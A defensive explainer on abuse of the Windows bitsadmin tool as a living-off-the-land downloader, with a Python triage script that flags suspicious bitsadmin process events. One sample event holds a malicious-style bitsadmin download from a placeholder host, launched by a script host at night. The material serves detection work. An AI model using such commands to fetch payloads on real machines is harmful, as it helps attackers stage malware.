bitsadmin is a Windows command-line utility for working with Background Intelligent Transfer Service (BITS) jobs. It can create, monitor, and manage background uploads or downloads using a built-in Windows transfer mechanism. Because it is a legitimate administrative tool, its process name and network activity can blend into normal system traffic.
That makes bitsadmin useful to attackers as a LOLBin, or living-off-the-land binary. In real attacks, it may be used to fetch payloads, stage scripts, or move files without dropping an obvious custom downloader. Defenders should look for unusual job names, unexpected external destinations, odd timing, and bitsadmin activity that is not tied to software updates or standard admin tasks. Correlating it with message-delivered attachments, script execution, or other native Windows tools helps reveal a larger attack chain.
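The checks listed above (job name, destination, timing, and the parent process that launched bitsadmin) can be applied to process-creation events as a simple triage pass. This is an added example, not part of the original page; the allowlisted host, job name, working hours, parent-process list and event field names are hypothetical values to replace with a local baseline.

```python
import re
from datetime import datetime
from urllib.parse import urlparse

# Assumed local baseline (hypothetical values): tune to your environment.
ALLOWED_HOSTS = {"updates.corp.example"}   # expected BITS destinations
KNOWN_JOBS = {"corp-agent-update"}         # job names used by sanctioned tooling
WORK_HOURS = range(7, 20)                  # 07:00-19:59, event time taken as local
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "winword.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
JOB_RE = re.compile(r'/(?:transfer|create)\s+(?:/(?:download|upload|upload-reply)\s+)?(?:"([^"]+)"|(\S+))', re.I)

def exe_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the reasons a process-creation event involving bitsadmin needs review."""
    if exe_name(event["image"]) != "bitsadmin.exe":
        return []
    reasons, cmd = [], event["command_line"]
    job = JOB_RE.search(cmd)
    if job and (job.group(1) or job.group(2)).lower() not in KNOWN_JOBS:
        reasons.append("unusual job name: " + (job.group(1) or job.group(2)))
    for url in URL_RE.findall(cmd):
        host = (urlparse(url).hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            reasons.append("unexpected destination: " + host)
    parent = exe_name(event["parent_image"])
    if parent in SCRIPT_PARENTS:
        reasons.append("spawned by " + parent)
    if datetime.fromisoformat(event["time"]).hour not in WORK_HOURS:
        reasons.append("outside working hours")
    return reasons

# Constructed sample events (not real telemetry), shaped like process-creation logs.
EVENTS = [
    {"time": "2024-05-14T10:15:02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Program Files\CorpAgent\updater.exe",
     "command_line": r"bitsadmin /transfer corp-agent-update /download /priority normal "
                     r"https://updates.corp.example/agent.msi C:\ProgramData\CorpAgent\agent.msi"},
    {"time": "2024-05-14T02:41:07", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"bitsadmin /transfer j1 /download /priority high "
                     r"http://files.example.invalid/a.dat C:\Users\Public\a.dat"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["time"], triage(ev) or "baseline")
```

An event that returns several reasons at once is the kind worth correlating with the mail and script-execution telemetry mentioned above.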



